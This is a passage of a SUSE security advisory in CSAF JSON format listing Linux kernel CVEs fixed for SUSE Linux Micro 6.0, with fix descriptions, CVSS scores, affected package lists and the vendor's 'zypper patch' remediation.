"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68378",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68378"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix stackmap overflow check in __bpf_get_stackid()\n\nSyzkaller reported a KASAN slab-out-of-bounds write in __bpf_get_stackid()\nwhen copying stack trace data. The issue occurs when the perf trace\n contains more stack entries than the stack map bucket can hold,\n leading to an out-of-bounds write in the bucket\u0027s data array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68378",
"url": "https://www.suse.com/security/cve/CVE-2025-68378"
},
{
"category": "external",
"summary": "SUSE Bug 1255614 for CVE-2025-68378",
"url": "https://bugzilla.suse.com/1255614"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68378"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68380",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68380"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix peer HE MCS assignment\n\nIn ath11k_wmi_send_peer_assoc_cmd(), peer\u0027s transmit MCS is sent to\nfirmware as receive MCS while peer\u0027s receive MCS sent as transmit MCS,\nwhich goes against firmwire\u0027s definition.\n\nWhile connecting to a misbehaved AP that advertises 0xffff (meaning not\nsupported) for 160 MHz transmit MCS map, firmware crashes due to 0xffff\nis assigned to he_mcs-\u003erx_mcs_set field.\n\n\tExt Tag: HE Capabilities\n\t [...]\n\t Supported HE-MCS and NSS Set\n\t\t[...]\n\t Rx and Tx MCS Maps 160 MHz\n\t\t [...]\n\t Tx HE-MCS Map 160 MHz: 0xffff\n\nSwap the assignment to fix this issue.\n\nAs the HE rate control mask is meant to limit our own transmit MCS, it\nneeds to go via he_mcs-\u003erx_mcs_set field. With the aforementioned swapping\ndone, change is needed as well to apply it to the peer\u0027s receive MCS.\n\nTested-on: WCN6855 hw2.1 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68380",
"url": "https://www.suse.com/security/cve/CVE-2025-68380"
},
{
"category": "external",
"summary": "SUSE Bug 1255580 for CVE-2025-68380",
"url": "https://bugzilla.suse.com/1255580"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68380"
},
{
"cve": "CVE-2025-68724",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68724"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id\n\nUse check_add_overflow() to guard against potential integer overflows\nwhen adding the binary blob lengths and the size of an asymmetric_key_id\nstructure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a\npossible buffer overflow when copying data from potentially malicious\nX.509 certificate fields that can be arbitrarily large, such as ASN.1\nINTEGER serial numbers, issuer names, etc.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68724",
"url": "https://www.suse.com/security/cve/CVE-2025-68724"
},
{
"category": "external",
"summary": "SUSE Bug 1255550 for CVE-2025-68724",
"url": "https://bugzilla.suse.com/1255550"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68724"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
